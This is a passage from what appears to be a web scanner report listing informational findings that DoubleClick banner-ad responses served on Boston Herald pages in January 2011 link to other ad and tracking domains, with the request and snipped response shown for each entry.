Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 02:01:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5228

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
65967&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/EVO_Shift_4G300x250.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087449;234174509;40401586&migRandom=5365967&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=40401586"></script>
...[SNIP]...

17.24. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.6

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000753541/mnum=0000950190/cstr=59127172=_4d433bca,0085444835,753541_950190_81_0,1_/xsxdata=$XSXDATA/bnum=59127172/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1687741401/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1687741401? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 21:57:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5224

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
09933&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/EVO_Shift_4G300x250.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087449;234174509;40401586&migRandom=7509933&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=40401586"></script>
...[SNIP]...

17.25. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.6

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=96618366=_4d435ebd,0063835233,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=96618366/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1419206302/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1419206302? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 00:26:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5225

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
67481&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/ATT_BBTorch300x250.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087449;234174509;40400793&migRandom=8067481&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=40400793"></script>
...[SNIP]...

17.26. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.6

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=16203302=_4d4383bd,5741228112,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=16203302/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1326230958/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1326230958? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 03:04:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5222

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
77124&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/ATT_BBTorch300x250.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087449;234174509;40400793&migRandom=777124&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=40400793"></script>
...[SNIP]...

17.27. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.6

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=80047564=_4d438276,3251816646,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=80047564/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/838084819/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=838084819? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 02:59:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5223

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
43359&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/EVO_Shift_4G300x250.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087449;234174509;40401586&migRandom=443359&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=40401586"></script>
...[SNIP]...

17.28. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.6

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=13094541=_4d437e49,8360874151,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=13094541/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1911576582/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1911576582? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 02:41:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5228

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
92154&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/EVO_Shift_4G300x250.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087449;234174509;40401586&migRandom=7792154&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=40401586"></script>
...[SNIP]...

17.29. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.6

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=38526334=_4d435ae2,5563376530,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=38526334/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/394936567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=394936567? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 00:10:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5226

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
81356&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/EVO_Shift_4G300x250.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087449;234174509;40401586&migRandom=7081356&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=40401586"></script>
...[SNIP]...

17.30. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.6

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=48780829=_4d438665,0582313713,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=48780829/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/845536281/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=845536281? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 03:16:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5223

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
62046&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/ATT_BBTorch300x250.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087449;234174509;40400793&migRandom=1462046&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=40400793"></script>
...[SNIP]...

17.31. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.6

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=51370141=_4d436570,0105242535,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=51370141/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/2000985820/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2000985820? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 00:55:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5225

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
94779&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/ATT_BBTorch300x250.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087449;234174509;40400793&migRandom=1394779&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=40400793"></script>
...[SNIP]...

17.32. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.6

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=44637896=_4d436f07,4152680175,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=44637896/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1452529046/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1452529046? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 01:36:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5225

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
49842&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/ATT_BBTorch300x250.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087449;234174509;40400793&migRandom=3849842&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=40400793"></script>
...[SNIP]...

17.33. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.6

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=69982493=_4d434c6f,2754240401,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=69982493/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1824141209/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1824141209? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 23:08:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5228

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
